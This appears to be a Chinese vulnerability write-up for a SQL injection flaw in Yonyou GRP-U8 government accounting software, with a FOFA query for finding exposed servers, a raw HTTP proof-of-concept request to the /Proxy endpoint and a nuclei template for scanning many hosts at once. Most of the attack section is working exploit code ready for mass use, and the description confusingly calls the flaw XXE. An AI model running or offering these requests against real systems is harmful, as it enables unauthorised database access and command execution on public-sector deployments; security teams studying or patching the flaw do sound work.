用友GRP-U8 Proxy SQL注入 CNNVD-201610-923
漏洞描述
用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行
影响版本
用友GRP-U8行政事业内控管理软件(新政府会计制度专版)
漏洞复现
fofa语法:title="用友GRP-U8行政事业内控管理软件"
登录页面:
POC:
POST /Proxy HTTP/1.1
Host:
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Content-Length: 352
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
nuclei批量yaml文件
id: yonyou_GRP-U8_Proxy_sqli_rce
info:
name: yonyou_GRP-U8_Proxy_sqli_rce
author: mczilong
severity: critical
description: title="用友GRP-U8行政事业内控管理软件"
tags: yonyou,oa
requests:
- raw:
- |
@timeout: 25s
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "<SESSIONID>"
- "ERROR"